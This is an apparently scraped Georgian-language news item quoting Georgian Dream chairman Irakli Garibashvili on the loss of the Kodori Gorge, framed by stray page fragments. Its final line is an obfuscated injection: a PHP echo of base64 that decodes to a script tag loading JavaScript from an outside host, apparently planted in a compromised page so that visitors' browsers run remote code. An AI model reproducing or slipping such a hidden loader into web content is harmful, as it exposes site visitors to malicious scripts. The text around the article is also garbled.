celsiusi
ავერსი საქკაბელი

 საზოგადოებაში ყოველთვის არსებობდა და იარსებებს კითხვები, რატომ ჩააბარეს კოდორის ხეობა, რატომ მოხდა, რომ რამდენიმე თვით ადრე დაარქვეს ზემო აფხაზეთი, – ამის შესახებ „ქართული ოცნების“ თავმჯდომარემ, ირაკლი ღარიბაშვილმა განაცხადა.

მისი თქმით, „ქართული ოცნება“ წლების განმავლობაში სასამართლოში ყველა პროცესის მოსაგებად, მიზნის მისაღწევად ამ საკითხზე არ საუბრობდა.

„ბავშვმაც იცის, რომ საქართველო საკუთარ ტერიტორიაზე ომს ვერ დაიწყებდა. ომს რაც შეეხება, ომის დეფინიცია შეგიძლიათ მოიძიოთ. მაგრამ, მე რა აქცენტებიც გავაკეთე და არა მხოლოდ, ძალიან ბევრი ბუნდოვანება არსებობს. აი, მარტივ კითხვას დაგისვამთ – კოდორის ხეობა, რომელიც საერთოდ მანამდე არ ფიგურირებდა, არც არავითარი პრეტენზია არ გამოგვითქვამს, არც სეპარატისტ აფხაზებს, როგორ მოხდა, რომ ამ ომის ფარგლებში, ხუთი დღეში უბრძოლველად ჩააბარეს ოკუპანტებს, გადასცეს და საერთოდ დაიკარგა? ამაზეც კითხვას არავინ აღარ სვამს და თქვენ მე მეუბნებით, რომ კითხვა უნდა დავსვა?! რას ნიშნავს. ჩვენი ძირძველი ტერიტორიები გადასცეს ოკუპანტ ქვეყანას და სეპარატისტებს. მე აღარ მსურს ამ თემაზე დეტალებში შევიდე, ძალიან ბევრი კითხვა არსებობს, ძალიან ბევრი ბუნდოვანება არსებობს. ჩვენ მთელი ეს წლები იმ მიზნის მისაღწევად, რომ უნდა მოგვეგო ყველა პროცესი სასამართლოში და ასეც მოხდა, ამ თემაზე ღიად არ ვსაუბრობდით, მაგრამ, რა თქმა უნდა, საზოგადოებაში ეს კითხვები ყოველთვის არსებობდა და ყოველთვის იარსებებს. კითხვები – რატომ ჩააბარეს კოდორის ხეობა. რატომ მოხდა, რომ რამდენიმე თვით ადრე დაარქვეს ზემო აფხაზეთი“, – განაცხადა ირაკლი ღარიბაშვილმა.

136
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");